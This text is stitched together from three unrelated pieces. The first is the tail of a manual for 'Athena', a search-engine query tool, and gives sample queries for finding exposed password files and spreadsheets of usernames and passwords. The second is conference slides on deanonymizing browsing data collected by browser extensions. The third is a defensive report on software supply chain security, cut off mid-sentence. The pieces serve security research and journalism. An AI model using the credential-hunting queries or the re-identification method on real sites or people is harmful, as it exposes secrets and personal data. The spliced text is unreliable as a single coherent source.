then I’d be very interested in hearing about it.
Further Information
The latest release of Athena is available from the Athena homepage an
http://www.buyukada.co.uk/projects/athena/ - There is also an
Athena mailing list accessible from the main Athena site.
Credit Where Credit’s Due
Athena couldn’t have been written without the help of a number of
people. Firstly, the guys at Foundstone who’s excellent SiteDigger
almost met my requirements and motivated me to write Athena,
jonny.ihackstuff.com for the inspiration, same goes for the Fravia guys
at searchlore.org. Thanks also go to Muad’dib and Jamaica Dave for
being great beta testers and of course to my wife Ozge, who’s put up
with my blobbing as I completely fail to juggle this, home and work.
Polite Notice
Athena could be misused to do some really bad things. Please don’t.
Every time you exploit something through Athena, you give me less of
an incentive to publicly release updates. If I get enough complaints
from search engine owners, I’ll take it offline.
Getting Started
Installing Athena is easy, just double-click on the installer and follow
the on-screen instructions. Once it’s installed, go to Start-Programs-
Athena-Athena or double-click the Athena Icon on your desktop. You
should get something like the picture below:
Figure 1: Athena’s startup screen
The screen layout
The screen is divided into 3 areas (shown in Figure 1): The menu(1),
query management(2) and the browser view(3). The menu allows you
to load xml configuration files, specify output files, exit and see an
about page.
The browser window is effectively an embedded Internet Explorer
instance, managed by the values in the query management area.
The query management area is where everything happens. The action
buttons (Search, Stop, Reload, Back, Forward and Exit) are fairly self-
explanatory. You can select which search engine supported by your
configuration file you want to use by using the Selected Search Engine
drop-down box. The Query Description Text box provides a description
of the refined query selection in the Query Selection box. Whenever a
change is made that will affect a URL to be submitted, the Current URL
box gets updated.
The default (with no configuration file loaded) settings are to use
google.com with no preset query types. This is so you can play around
and get a feel for Athena straight away.
Your first query with Athena
Using Athena is easy. Go to File-Open and open google.xml. Athena is
now set up to search using google. In the selected search engine drop
down box there will be various google sites to choose from. Stick to
the Default (Google.com). Scroll down the Query Selection list and
select "robots.txt" "Disallow:" filetype:txt. In the Refine Query box,
type site:whitehouse.gov and click on search. The query description
states that this query looks for robots.txt files that contain disallow
fields, telling the search engine where not to look. Our use of site:
whitehous.gov restricts the search to the whitehouse.gov domain and
is a google specific extension. Figure 2 shows the results.
Figure 2: Using Athena to identify potential SQL injection
Now select Google (Pages from the UK) from the Selected Search
Engine drop-down box. This time there should be no findings. Switch
to Google (TR) and Change the refine query entry to site:.tr then hit
Search.
Note: Do not click through to any of the sites shown in this tutorial. If
you really must look, use the google cache.
Open the yahoo.xml config in Athena. Athena will now use Yahoo for
searches. From the Selected Search Engine drop down box choose
Yahoo.com. Scroll down the query list, select filetype:xls username
password email and hit Search. Using the site: prefix it is possible to
restrict searches to specific tlds, domains or subdomains.
Your first query with Athena
Logging with Athena is easy. Go to File-Output Log and choose a place
to save your logs. From now on any requests made with the search
button will be logged, along with the timestamp and a blank line in
case you want to write anything in there. Logs are written to until the
program is closed or the log file is changed.
Note: Only use of the search button is logged. Clicking through the
browser window or using Internet Explorer itself isn’t. If you want
something to appear in the logs, use the search button!
Hints and Tips
Using Athena is fairly easy, but here are some tips to help get the
most out of it.
NEVER click through from a search result to a site without permission.
Some of the searches could generate URLs that if accessed could
constitute unethical hacking in either your or the target host’s country.
At the very least you may well be violating the Acceptable Use Policy
of the search engine you’re using if your terms are too vague. If you’re
in any doubt that what you’re doing is legal, then don’t.
If you’re authorised, check the search engine cache as well as the
actual page. Sometimes there’s more to be found in a cached copy
than the real thing.
Only searches using the search button are logged – if you hit the next
page of search results in the browser window, it isn’t logged. That’s
why there’s a blank line after each log entry, so you can put this stuff
in along with your notes.
Learn a bit about the syntax of the search engines your using – being
able to refine queries that little bit more to specific targets can yield
significantly better results than a massive web-wide search.
Play with the XML configs, write your own search query items and
search engine prefix/postfix combinations, then send them to me at
[email protected]!
Athena’s Configuration Format
Athena uses an XML file (based on SiteDigger’s for compatibility
purposes) for its configuration. Actually it’ll read almost anything you
throw at it as long as certain tags are there; it doesn’t have to be
strictly valid XML. Athena’s configuration files have two sections –
Search Engines and Search sections. The searchEngineSignature tag
surrounds everything. The searchEngine tags are the wrappers for
Search Engine definitions. There are only 3 tags used in the
searchEngine section: searchEngineName, searchEnginePrefix and
searchEnginePostfix. These entries have to be there – the order
doesn’t matter too much. Consider the following examples:
<searchEngine>
<searchEngineName>Google (UK)</searchEngineName>
<searchEnginePrefixUrl>http://www.google.co.uk/search?q=</searchEnginePrefixUrl>
<searchEnginePostfixUrl>%26ie=UTF-8%26hl=en%26meta=</searchEnginePostfixUrl>
</searchEngine>
<searchEngine>
<searchEngineName>Google (Pages from the UK)</searchEngineName>
<searchEnginePrefixUrl>http://www.google.co.uk/search?hl=en%26ie=UTF-
8%26q=</searchEnginePrefixUrl>
<searchEnginePostfixUrl>%26btnG=Search%26meta=cr%3DcountryUK%7CcountryGB</searchEn
ginePostfixUrl>
</searchEngine>
The above is fine. As is the above without the <searchEngine> and
</searchEngine tags. However, if one searchEngineName follows
another then the second searchEngineName is the one added to the
drop down box. Hey, I told you it was bad code! Speaking of bad code,
one of the issues with using XML is that .NET’s XML reader really hates
ampersands. I’ll fix it eventually, but in the meantime you need to
search and replace all & symbols with %26 throughout your XML file,
otherwise it’ll crash spectacularly when it tries to load the XML in.
The Search section is completely compatible with Foundstone’s
SiteDigger. This uses the format below. For the sake of readability, the
tags used by Athena are shown below. If you create your own XML
files please add the rest of the tags. Even if you leave them blank
SiteDigger will still read them.
<signature>
<signatureReferenceNumber>23</signatureReferenceNumber>
<categoryref>T2</categoryref>
<category>TECHNOLOGY PROFILE</category>
<querytype>DON</querytype>
<querystring>intitle:index.of master.passwd</querystring>
<shortDescription>HTTP Access Password File</shortDescription>
<textualDescription>This query looked for a directory listing that might contain a
password file.</textualDescription>
<cveNumber>1000</cveNumber>
<cveLocation>http://www.1000.com</cveLocation>
</signature>
ChangeLog
13/06/04 – Athena 1.0 released. Fixed the following bugs:
Crash when Query List box is selected after loading a fresh config
without selecting a search engine from the drop down box first.
Logging prints extra newline for each entry
Got multiple search engine support working (Almost) completely
properly
05/06/04 – Athena 0.6. Fixed bugs:
Lotsa crashes fixed. Removed Search engine title and replaced with
drop-down list… which doesn’t work too well.
Removed GoogleHack references, got Prefix working, but not
implemented Postfix yet.
01/06/04 – Athena 0.5.
Multiple Search engines sorted, but one config file needed for
Google.com, another for .co.uk, another for .com.tr etc. Works with
Yahoo! Put some exception catching in, along with a large number of
Duct tape grade kludges.
28/05/04 – Athena 0.1b
Exceptions? We don’t need no stinking exceptions! Lots of crashes.
OFD cancel causes all containers to clear! Ampersand bug in XML
reader.
23/05/04 – GoogleHack 0.2 (Athena 0.1)
Basic browser window, query list box for searches. Queries are hard
coded into the program – need a config file.
20/04/04 – GoogleHack 0.1
Uses babelfish and google translator to search google. Proof of
concept.
Todo
Code cleanup
More search engine configs (send me yours!)
Implement SiteDigger XML category drop-box to make query fragment
finding quicker – but not sure if this is a good idea. | pdf |
Dark Data
Svea Eckert – Andreas Dewes
Who we are
Svea Eckert
Journalist (NDR/ ARD)
@sveckert
@japh44
Andreas Dewes
Data Scientist (DCSO & 7scientists)
Why we are here
“US Senate voted to eliminate broadband privacy rules
that would have required ISPs to get consumers' explicit
consent before selling or sharing Web browsing data (...)“
3/23/2017
https://arstechnica.com
What does that mean
You can see
everything
–
S*#t!
ARD, Panorama, 03.11.2016
ARD, Panorama, 03.11.2016
I don‘t know, why I
was searching for
“Tebonin” at that
time.
This is really bad to
see something like
this – especially if it is
connected with my
own name.
Employee of Helge Braun, CDU – Assistant Secretary of the German Chancellor
How we did it – the “hacking” part
Social engineering
Social engineering
What did we get?
Our data set
3.000.000.000
9.000.000
3.000.000
URLs
(insufficiently anonymized)
Domains
Users
https://www.google.com/?q=xxxx... [user id] [timestamp] …
30 days of data per user
Statistical Deanonymization
https://www.cs.cornell.edu/~shmat/shmat_oak08netflix.pdf
How does it work?
...
anonymized user data
public / external personal data
User 1
User 2
User N
Identifier
(e.g. name)
e.g. „user 1 visited domain X“
Let‘s try this!
...
...
...
...
...
Domains
Users
=> sparsely populated matrix with 9.000.000 x 1.000.000 entries
Our Algorithm
▪ Generate user/domain matrix M
▪ Generate vector v with information
about visited domains
▪ Multiply M·v
▪ Look for best match
M = (...)
w = M·v
i = argmax (w)
How well does this work?
15.561
1.114.408
www.gog.com
kundencenter.telekom.de
banking.sparda.de
11
367
1
handelsblatt.com
But how can public information be extracted?
Two examples
Twitter
• We use the Twitter API to
download tweets from the
relevant time period (one
month)
• We extract URLs from the
tweets and generate the
associated domain by
following the links
• We feed the domain
information into our algorithm
users (arbitrarily sorted)
number of matching domains
Visited
Websites
github.com (2.584.681)
www.change.org (124.152)
fxexperience.com (394)
community.oracle.com (5161)
paper.li (2689)
javarevisited.blogspot.de (525)
www.adam-bien.com (365)
rterp.wordpress.com (129)
Gotcha!
Examples
Seemingly harmless identifiers can betray you
https://www.youtube.com/watch?v=DLzxrzFCyOs
Youtube
▪ We download public playlists
from users (often linked via
Google+)
▪ We extract the video IDs using
the Youtube API
▪ We feed the resulting video
Ids into our algorithm (this
time initialized with video IDs
instead of domains)
users (arbitrarily sorted)
number of matching videos in profile
02Zm-Ayv-PA
18rBn4heThI
2ips2mM7Zqw
2wUvlTUi8kQ
34Na4j8AVgA
3VVuMIB2hC0
4fXvJHrbUTA
4ulaGjwiIbo
5BzkbSq7pww
5RDSkR8_AQ0
680R1Gq2YYU
6IHq9yv_qis
8d5QEWdHchk
...
Gotcha!
Example
Video-IDs:
More ways to
extract public
information
▪ Google Maps URLs
(contain
latitude/longitude)
▪ Facebook Post IDs
(URLs were
anonymized in the
data set but IDs
were shared)
▪ …
"Instant" deanonymization via a unique URL
What did we find in the data?
Ladies and Gentlemen, because of an investigation concerning computer fraud
(file number), which I have dealt with here, § 113 TKG i.V.m. § 100j StPO I need
information on following IP address: xxx.xxx.xxx.xxx Time stamp: xx.xx.2016,
10:05:31 CEST
The data is needed to identify the offender. Please send your answer by e-mail
to the following address
[email protected] or by fax.
first name
Last Name
Detective Chief Place of county
Cybercrime
phone number
Where do I find tilde on my keyboard
What is IP 127.0.0.1
One last example
Who collected the data?
Browser Plugins
Test in virtual machine
Test
Uninstalled Ad-Ons
Suspected WOT (Web of Trust)
[DATUM] 11:15:04 http://what.kuketz.de/
[...]
[DATUM] 15:49:27 https://www.ebay-kleinanzeigen.de/p-anzeige-bearbeiten.html?adId=xxx
[DATUM] 13:06:23 http://what.kuketz.de/
[...]
[DATUM] 11:22:18 http://what.kuketz.de/
[DATUM] 14:59:30 http://blog.fefe.de/
[...]
[DATUM] 14:59:36 http://what.kuketz.de/
[DATUM] 14:59:44
https://www.mywot.com/en/scorecard/what.kuketz.de?utm_source=addon&utm_content=rw-viewsc
[...]
[DATUM] 13:48:24 http://what.kuketz.de/
[...]
test by Mike Kuketz / www.kuketz-blog.de
How many extensions are affected?
95 % of the data comes
from only 10 extension
(variants/versions).
Many more are spying on
their users, but have a
small installation base.
Up to 10.000 extension
versions affected (upper
bound analysis via
extension ID).
rank of extension
number of data points from extension
Why use extensions for tracking?
tracking server
(How) can I protect myself against tracking?
Rotating proxy servers (n >> 1)
e.g. TOR or a VPN with rotating exit
nodes
Client-side blocking of trackers
Can I hide in my data by generating noise?
(e.g. via random page visits)
Usually not
¯ \_(ツ)_/¯
argmax ||M·v|| is robust against isolated (additive) perturbation
Takeaways
Often, only a few external
data points (<10) are suffcient
to uniquely identify a person.
The increase in publicly available
information on many people
makes de-anonymization via
linkage attacks easiert than ever
before.
High-dimensional, user-related data
is really hard to robustly anonymize
(even if you really try to do so).
Special thanks to
Kian Badrnejad, NDR
Jasmin Klofta, NDR
Jan Lukas Strozyk, NDR
Martin Fuchs @wahlbeobachter
Stefanie Helbig
Mike Kuketz, kuketz-blog.de
Many further sources and contributors
TV shows ARD Panorama, NDR Panorama3 and ZAPP
http://daserste.ndr.de/panorama/aktuell/Web-Strip-Intimate-data-from-federal-politicians-for-
sale,nacktimnetz114.html
Questions?
Svea Eckert
Journalist NDR/ ARD
@sveckert
@japh44
[email protected]
[email protected]
Andreas Dewes
Data Scientist | pdf |
Overview
Key Findings
Recommendations
Software engineering leaders focused on software engineering strategies should work with their
security and risk counterparts to:
Licensed for Distribution
How Software Engineering Leaders Can Mitigate
Software Supply Chain Security Risks
Published 15 July 2021 - ID G00752454 - 19 min read
By Manjunath Bhat, Dale Gardner, and 1 more
Attackers are targeting software development systems, open-source artifacts and DevOps
pipelines to compromise software supply chains. Software engineering leaders must guide
their teams to protect the integrity of the software delivery process by adopting practices
described in this research.
The increased threats of malicious code injection makes it critical to protect internal code and
external dependencies (both open-source and commercial).
■
Leaked secrets or other sensitive data and code tampering prior to release are consequences
of a compromised software build and delivery pipeline.
■
Failure to enforce least privilege entitlements and flat network architectures enables attackers
to move laterally against the operating environment, putting the enterprise at greater risk.
■
Protect the integrity of internal and external code by enforcing strong version-control policies,
using artifact repositories for trusted content, and managing vendor risk throughout the
delivery life cycle.
■
Harden the software delivery pipeline by configuring security controls in CI/CD tools, securing
secrets and signing code and container images.
■
Secure the operating environment for software engineers by governing access to resources
using principles of least privilege and a zero-trust security model.
■
Strategic Planning Assumption
By 2025, 45% of organizations worldwide will have experienced attacks on their software supply
chains, a three-fold increase from 2021.
Introduction
Software engineering leaders are at the forefront of digital business innovation. They are
responsible not only for software development and delivery, but are also increasingly accountable
for implementing security practices. These practices have traditionally focused on activities such
as scanning code for potential security vulnerabilities and patching software systems.
However, software supply chain attacks are becoming increasingly sophisticated, with malicious
actors exploiting weaknesses at every stage in the software procurement, development and
delivery life cycle. This includes everything from injecting malicious code into open-source
packages to installing back doors in postdeployment software updates.
As a result, software engineering teams must assume that all code (both externally sourced and
internally developed), development environments and tooling may have been compromised. In
addition, security hygiene should now extend to external code dependencies and commercial off
the-shelf (COTS) software, which includes the use of third-party APIs.
This research explains how software engineering leaders can counter the threat of software
supply chain attacks. See Figure 1 for secure development practices to guard against software
supply chain attacks. Figure 2 highlights the potential security risks at each stage of the delivery
process.
Figure 1: Top Practices to Mitigate Supply Chain Security Risks in
Software Development and Delivery
A software supply chain attack is the act of compromising software or one of its dependencies at
any stage throughout its development, delivery and usage. Although the precise attack vector may
vary in each case, the attacker usually gains unauthorized access to development environments and
infrastructure including version control systems, artifact registries, open-source repositories,
continuous integration pipelines, build servers or application servers. This allows the attacker to
modify source code, scripts and packages, and establish back doors to steal data from the victim’s
environment. Attacks are not limited to external actors; they can come from insider threats as well.
The attacks on SolarWinds (2020), NetBeans IDE (2020), Kaseya (2021) and Codecov (2021)
represent four prominent examples of software supply chain attacks (see the Evidence section and
Notes 1 through 5). Gartner believes that By 2025, 45% of organizations worldwide will have
experienced attacks on their software supply chains, a three-fold increase from 2021.
This research will address the following security concerns Gartner encounters in client inquiries:
Figure 2: Potential Software Supply Chain Security Risks
Analysis
Protect the Integrity of Internal and External Source Code
Software engineering teams use version control systems (VCSs) and artifact repositories to
maintain internally developed code and external artifacts. Failing to enforce security controls in
these tools exposes source code and artifacts to potential manipulation and tampering.
We recommend three practices that protect the integrity of internal and external code:
1. Strong version control policies
2. Trusted component registries
3. Third-party risk management
Strong Version Control Policies
Git-based VCSs including BitBucket, GitHub and GitLab provide native security and access
protection capabilities. Software engineering teams must leverage access policy controls, branch
protection and secrets scanning capabilities. These controls are not enabled by default and must
be explicitly set. See Figure 3.
Compromise of continuous integration/continuous delivery (CI/CD) systems
■
Injection of malware into legitimate software
■
Inclusion of vulnerable and malicious dependencies
■
Figure 3: Strong Version Control Policies
Secrets and credentials should never be stored in source code repositories, but software
engineers can accidentally commit secrets to source control. Since any user who has access to
the repository can clone the repository and store it anywhere, the cloned repository becomes a
treasure trove for attackers looking to steal credentials, API keys or secrets. We recommend
continuous scanning of repositories to check for files embedded with secrets using either open-
source tools or provider-native capabilities (see Table 1).
Table 1: Representative list of Secrets Scanning tools for Git Repositories
Open-Source Tools
Vendors
git-secrets: Open sourced by AWS Labs
GitHub Secrets Scanning
Repo Supervisor: Open sourced by Auth0
GitLab Secret Detection
truffleHog: Searches for secrets in Git repos
Bitbucket Secrets Scan
Gitleaks: Scans repos and commits for secrets
GitGuardian
Source: Gartner
Trusted Component Registries
As software is increasingly assembled using open-source components, third-party packages and
public APIs, the threat of supply chain attacks due to malicious code looms large (see Note 5 for
examples of package typosquatting attacks in popular open-source libraries). We recommend the
use of artifact (and container) repositories, software composition analysis tools and code
scanning tools.
Artifact Repositories
Artifact repositories enable securing, versioning and safely distributing software packages — both
internally built and externally sourced. The repositories act as a trusted source for sanctioned and
vetted artifacts and software components. This enables centralized governance, visibility,
auditability and traceability into software “ingredients.”
Since the repositories can act as proxies to external public registries, it has the added benefit of
keeping the packages continuously updated and patched. One of the defense agencies uses a
centralized artifact repository (“Iron Bank” 1) that stores signed container images for both OSS
and COTS. See Note 2 for open-source container signing tools.
Examples of artifact repositories:
Examples of container registries:
Deadshot: Open sourced by Twilio
SpectralOps
Azure Artifacts
■
AWS CodeArtifact
■
GitHub
■
GitLab
■
Google Artifact Registry
■
JFrog Artifactory
■
Sonatype Nexus Repository
■
Tidelift Catalogs
■
■ Amazon ECR
Software Composition Analysis (SCA)
SCA complements artifact and container registries by analyzing stored artifacts or container
images to uncover known vulnerabilities. Without SCA, it is difficult to manage dependencies at
scale and to identify known vulnerabilities in published components. Gartner recommends pairing
artifact repositories with integrated SCA and open-source governance capabilities. Examples
include Sonatype Nexus Repository with IQ Server or JFrog Artifactory with Xray (see Market
Guide for Software Composition Analysis).
Code Scanning
Although SCA uncovers known vulnerabilities (often CVE IDs) in published software packages, it
will not help with detecting potentially exploitable flaws that exist in custom application code. We
recommend using application security testing tools for static (SAST), dynamic (DAST) and fuzz
testing of application code. Some AST tools offer SCA capabilities (see Magic Quadrant for
Application Security Testing).
Third-Party Risk Management
Software engineering teams not only build their own software but also consume software
developed by other organizations (including vendors, partners and service providers). This section
will focus on assessing and managing the two kinds of supply chain risks typically associated
with third-party software:
Gartner recommends the following practices to mitigate these risks:
Azure Container Registry
■
CNCF Harbor
■
Docker Trusted Registry
■
GitHub
■
GitLab
■
Google Container Registry
■
JFrog Artifactory
■
Red Hat Quay
■
Risks due to known vulnerabilities in third-party or open-source dependencies (for example,
Equifax, SaltStack). 3,4
■
Risks due to back doors/malware implanted in externally procured software (for example,
SolarWinds attacks). 5
■
Check for adherence to standards and certifications: Require software suppliers to be certified
against relevant security standards such as UL 2900 for IoT certification and ISO/IEC 27034 to
ensure adherence to consistent and formalized application security practices. This may include
requiring a specified level of developer testing and evaluation. For example, static and dynamic
code analysis, threat modeling and vulnerability analysis, third-party verification of processes,
manual code review and penetration testing.
See Note 6 for frameworks and standards that help evaluate your provider/partner’s supply chain
security posture.
Audit the provider’s software build, deployment and upgrade process: Ask these questions to
benchmark software providers against a minimal baseline:
In software, the chain isn’t as strong as its weakest link; it’s as weak as all
the weak links multiplied together.
— Steve McConnell
Harden the Software Development and Delivery Pipeline
Gartner recommends three practices to strengthen the security of the software delivery pipelines:
Implement Secrets Management
Does the provider have the necessary controls to secure their SDLC process? (see 12 Things to
Get Right for Successful DevSecOps.)
■
What process does the provider follow to patch its own software and its dependencies?
Request a software bill of materials that helps track nested dependencies. See Note 3 for
tracking open-source dependency chains and assessing security posture of open source
projects (upstream).
■
Is the mechanism to deliver the patch protected from external attacks?
■
What is the SLA for patching a vulnerability discovered in the vendor’s software or its
dependencies?
■
■
Implement secrets management
■
Implement signing and hashing to verify integrity of source code
■
■ Configure security controls in CI/CD pipelines
Hard-coding secrets in code and configuration files significantly increases the risk of
compromising build pipelines and development environments. In addition, storing any type of
secret in a container image can expose that data inadvertently, particularly if images are stored in
public registries. Software engineering teams must continuously check committed code and
artifacts for embedded secrets.
Secrets management provides a disciplined approach to managing and securing secrets such as
credentials, passwords, API tokens and certificates. We recommend the use of secrets
management tools to automate creation, storage, retrieval and revocation of secrets. This helps
avoid embedding (hard-coding) secrets in source code, configuration files and infrastructure
automation scripts. See Table 2 for representative providers of secrets management tools for
multiple development scenarios.
Table 2: Secrets Management Tools
Platform-agnostic tools
Cloud-provider tools
Container-native environments
Configuration Management
Use Case
Secrets Management Tool
Akeyless
■
CyberArk Conjur
■
Thycotic Secrets Vault
■
HashiCorp Vault
■
AWS Secrets Manager
■
Azure Key Vault
■
GCP Secret Manager
■
Kubernetes Secrets (etcd),
■
Sealed Secrets
■
Ansible Vault
■
Chef Data Bag
■
Puppet Hiera
■
Source: Gartner
Secrets such as credential files, private keys, passwords and API tokens
should not be committed to a source control repository. Use a secrets
management tool to securely store and encrypt secrets, enforce access
controls and manage secrets (that is, create, rotate and revoke).
Implement Signing and Hashing to Verify Integrity of Source Code
Hashing and signing can be used to verify integrity of source code and binaries. VCSs generate
hashes (unique identifiers) for individual files during commits. These hashes help validate that the
files are not altered in transit. Likewise, compilers generate hashes as well. Compiler-generated
hashes (during CI/CD) can be compared with file hashes generated by static file analyzers (during
scanning). This ensures that the code being shipped is the same as the code that was scanned.
See Note 7 for hashing and code signing tools.
Commit Signing
Hashing does not address the needs of provenance and authenticity, which is why we recommend
signing. VCSs support signed commits to provide others the assurance that the files originated
from a trusted source. As examples, GitHub and GitLab attach a “verified” label against signed
commits when the signature can be verified for valid users. Think of this like Twitter verified
accounts — where Twitter confirms the account holder’s identity.
Container Signing
As organizations move to container-based deployments and source containers from different
locations, ensuring the integrity of container images becomes paramount. Gartner recommends
signing container images even if your organization builds and maintains internal images. This is
because any issue in third-party code or dependencies impacts the security posture of your
running applications(see Figure 4). See Note 2 for open-source container signing tools.
Figure 4: Propagation of Container Image Vulnerabilities in
Kubernetes
Configure Security Controls in CI/CD Pipelines
CI/CD systems, if left unsecured, introduce security risks in the software delivery pipeline. For
example, attackers can manipulate build pipeline definitions to suppress checks, allowing
malicious code to pass through or redirect releases to a malicious delivery target. CI/CD pipelines
must be configured with the elevated security and access controls, as they may be turned off by
default.
Attackers are increasingly targeting build pipelines as an attack vector. Therefore, software
engineering leaders must implement security tools to protect code integrity and prevent code
tampering in the build pipeline. Representative providers of these tools include Apiiro, Argon,
Cycode, Garantir, GrammaTech, JFrog (Vdoo) and RunSafe Security.
Software engineering teams must adopt these practices to protect their CI/CD pipelines:
Compromised IDEs resulting in trojanized builds present the most serious supply chain security risk
in software delivery. Examples include XcodeGhost malware (Xcode IDE in 2015), Octopus Scanner
(NetBeans IDE in 2020), vulnerable VS Code extensions and Node.js Debugger.
Browser-based IDEs eliminate the risk of compromising locally installed IDEs on developer
machines. Browser-based IDEs either enable web access to a remote development environment or
sandbox the IDE within the browser security context. This decouples the development workspace
from the physical workstation which may not be adequately protected. Examples of browser-based
IDEs include Codeanywhere, GitHub Codespaces, Gitpod, Replit and StackBlitz.
Secure the Operating Environment for Developers
Software development environments span multiple distributed systems, platforms and tools,
communicating with each other in the software delivery life cycle using privileged service
accounts. For example, build machines communicate with source code repositories to pull source
code and artifact repositories to pull common packages, and connect to deployment targets to
deploy binaries. The risk is that the tools and services default to running with elevated system
privileges without privilege access controls in place.
Least Privilege Access Policies and Methods
The ability to connect to different machines on a network and elevated system privileges allows
attackers to infiltrate other machines and services once they gain access to one system. In
addition, a compromised executable can establish unauthorized connections to other critical
systems unless the right access controls are put in place. Therefore, we recommend the use of
role-based authentication and authorization, adaptive access using zero-trust security model and
privilege access management (see Figure 5).
Reproducible build practices to ensure that a given source code always results in the same
build output. See Note 4 for details on the “reproducible-builds” project and tools.
■
Signed Pipelines that create immutable, verifiable artifacts. For example, JFrog Signed
Pipelines and Tekton Chains enable signing artifacts generated during a pipeline run to ensure
immutability and verify provenance at the end of the pipeline execution.
■
Figure 5: Methods to Govern User Access and Privileged Accounts
Zero-Trust Network Access (ZTNA) provides controlled identity- and context-aware access to
development resources, reducing the surface area for supply chain attacks. It eliminates excessive
implicit trust placed on machines and services simply because they share the same network,
replacing it with explicit identity-based trust (see Market Guide for Zero Trust Network Access).
We recommend privileged access management (PAM) tools to monitor and protect privileged
service accounts that run builds and automation jobs. In the SolarWinds attack, attackers
modified trusted domains and abused privileged roles (see Note 1). We see that as a confirmation
that privileged accounts are a primary target. Mitigating this risk often requires privileged
accounts to be managed by a PAM (see Top 10 Lessons Learned From the SolarWinds Attack).
PAM tools help vault privileged passwords, limit access to authorized users, rotate credentials
frequently and monitor the usage of privileged accounts. Vendors such as Akeyless (Zero Trust
Access), Britive and HashiCorp (Boundary) combine dynamic secrets, authentication,
authorization and just-in-time credentials to enforce least privilege access to services and
resources.
Machine Identity Management
Distributed application architectures, cloud-native infrastructure and APIs-as-products have
increased the granularity and volume of machine identities. Hosts, containers, VMs, applications,
database servers, services and API endpoints all use distinct machine identities. Machine
identities enable the services and endpoints to uniquely authenticate themselves while interacting
with other services.
The scale and speed at which machine identities are used to authenticate
and access services throughout the software supply chain makes machine
identity management now an imperative.
Examples of machine identities include server credentials such as TLS certificates and SSH host
keys, and client credentials such as OAuth credentials, API tokens and database connection
strings. Machine identity management (MIM) is the discipline of managing the life cycle and
access to these identities. MIM is not a single tool or market. It is a collection of practices and
tools that enhances trust and integrity of machine-to-machine interactions, which is critical to
securing development environments (see Table 3).
Table 3: Tools and Providers for Machine Identity Management
Encryption of data at rest, management of
symmetric keys
Key
management
systems
Use Case
Domain
Sample
Providers
Akeyless
■
AWS
■
KMS
■
Azure
■
Twilio (Ionic)
■
Fortanix
■
PKWARE
■
Thales and
Townsend
Security
■
Storing secrets used in the DevOps pipeline,
issuance of machine identities to containers
Secrets
management
Authentication, encryption and signatures for
code signing
PKI and
certificate
management
Discovering and controlling privileged access to
critical systems
Privileged
access
management
Use Case
Domain
Sample
Providers
Akeyless
■
AWS
■
Microsoft Azure
■
BeyondTrust
■
CyberArk
■
Fortanix
■
Google Cloud
Platform (GCP)
■
HashiCorp
■
ThycoticCentrify
■
AppViewX
■
AWS
■
DigiCert
■
Entrust
■
GlobalSign
■
Keyfactor
■
Microsoft
■
The Nexus
Group
■
Sectigo
■
Venafi
■
Akeyless
■
BeyondTrust
■
Broadcom
■
CyberArk
■
One Identity
■
ThycoticCentrify
■
Source: Gartner
Anomaly Detection and Automated Response
One of the lessons from the SolarWinds attack is that software engineering teams are ill-equipped
to detect and respond to anomalies before damage is done. Malicious attacks on software
development pipelines have a high likelihood of surfacing as an anomalous activity.
Examples of such anomalous activity include:
Software engineering leaders must work closely with security and risk teams to understand and
define the expected behavior of their development platforms and tools so they can detect
anomalies in real time. For example, EDR, CWPP, NDR or tools such as osquery can monitor for
system anomalies. Build systems, including PCs used by software engineers, should not be
exempt from EPP/EDR protection for this reason.
Anomaly detection and response is especially critical in container-native, GitOps-based
deployments that automate the full code-to-container workflow. Although container image
scanning tools in the development phase help detect known vulnerabilities, software engineering
teams must deploy tools to visualize container traffic, identify cluster misconfigurations and alert
on anomalous container behavior and security events.
See Market Guide for Cloud Workload Protection Platforms for container and Kubernetes-focused
tools.
Evidence
1 Iron Bank
2 2020 State of the Software Supply Chain Report, Sonatype
Use Case
Domain
Sample
Providers
Executables establishing seemingly strange and unnecessary connections with their
“command and control” centers.
■
Increases in the number of processes or threads, CPU and memory utilization on select
machines.
■
Spikes in network access, repository uploads/downloads and unexpected directory access
traffic.
■
Monitor for cloning of source code repositories using logging or other monitoring tools, such as
an EPP or SIEM. CASBs can also be useful in cases of SaaS-based version control systems.
■
3 Equifax Dat Breach, Epic.org
4 SaltStack Authorization Bypass, F-Secure Labs
5 SolarWinds Security Advisory, SolarWinds
Note 1: Examples of Software Supply Chain Security Attacks
SolarWinds — Roughly 18,000 customers of SolarWinds downloaded trojanized versions of its
Orion IT monitoring and management software. The supply chain attack led to the breach of
government and high-profile companies after attackers deployed a backdoor dubbed SUNBURST
or Solorigate.
Octopus Scanner Malware — Octopus Scanner, an OSS supply chain malware targets NetBeans
IDE injecting backdoor code into resulting JAR files built with the IDE.
Codecov — U.S. cybersecurity firm Rapid7 had also revealed that some of their source code
repositories and credentials were accessed by Codecov attackers.
Note 2: Open-Source Projects for Container Signing and Admission
Tools
Grafeas defines an API spec for managing metadata about software resources, such as
container images, VM images, JAR files, and scripts. It provides a centralized knowledge base for
artifacts, their origins, vulnerabilities, dependencies, etc. that make up the code-to-container
supply chain.
Kritis is a Kubernetes admission controller that runs policy checks defined by the Kubernetes
cluster admin, at runtime and then either approves or denies the pod to be launched — based on
vulnerabilities in the image or if the image is not obtained from a trusted source.
Kritis Signer is a command-line tool that creates attestations for a container image.
Cosign signs container images. Cosign is developed as part of the sigstore project hosted by the
Linux Foundation. The goal of sigstore is to ease the adoption of signing software artifacts.
Note 3: Tracking Open-Source Dependency Chains
Open Source Insights shows information about a package without requiring users to install the
package first. Developers can see what installing a package means for their project, how popular
it is, find links to source code, and then decide whether it should be installed.
OSSF Scorecard is a tool that helps evaluate security posture of OSS projects.
Supply chain Levels for Software Artifacts (SLSA, pronounced “salsa”), an end-to-end framework
for ensuring the integrity of software artifacts throughout the software supply chain. It is inspired
by Google’s internal “Binary Authorization for Borg” and secures all of Google’s production
workloads.
Note 4: Reproducible Builds
The motivation behind the Reproducible Builds project is to allow verification that no
vulnerabilities or backdoors have been introduced during the compilation process. Tools such as
diffoscope help compare files, directories and identify what makes them different. It can
compare jars, tarballs, ISO images, or PDFs.
Three guiding principles underpin the idea of reproducible builds:
Note 5: Package Typosquatting Supply Chain Attacks
Typosquatting is a type of software supply chain attack where the attacker tries to mimic the
name of an existing package in a public registry hoping that developers will accidentally
download the malicious package instead of the legitimate one. An npm package (loadsh) was
typosquatting the popular lodash package using the transposition of the “a” and “d” characters.
See this whitepaper for more details: SpellBound: Defending Against Package
Typosquatting.Using artifact registries, software composition analysis and code scanning
reduces the risk from package typosquatting attacks on public repositories.
As noted in the 2020 State of the Software Supply Chain Report 2 by Sonatype, “Bad actors are no
longer waiting for public vulnerability disclosures. Instead, they are taking the initiative and actively
injecting malicious code into open-source projects that feed the global supply chain. By shifting
